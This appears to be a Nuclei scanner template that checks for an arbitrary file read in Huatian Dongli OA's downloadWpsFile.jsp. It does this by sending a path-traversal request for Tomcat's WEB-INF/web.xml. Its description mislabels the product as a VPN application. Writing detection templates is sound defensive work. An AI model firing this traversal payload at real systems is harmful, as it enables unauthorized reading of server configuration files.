id: 华天动力OA downloadWpsFile.jsp 任意文件读取

info:
  name: 华天动力OA downloadWpsFile.jsp 任意文件读取
  author: admin
  severity: high
  description: This template detects file inclusion vulnerability in the VPN application.
  tags: file-inclusion, lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/OAapp/jsp/downloadWpsFile.jsp?fileName=../../../../../../htoa/Tomcat/webapps/ROOT/WEB-INF/web.xml"

    headers:
      User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0"
      Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8"
      Accept-Language: "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
      Accept-Encoding: "gzip, deflate, br"
      Connection: "close"

    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "xml"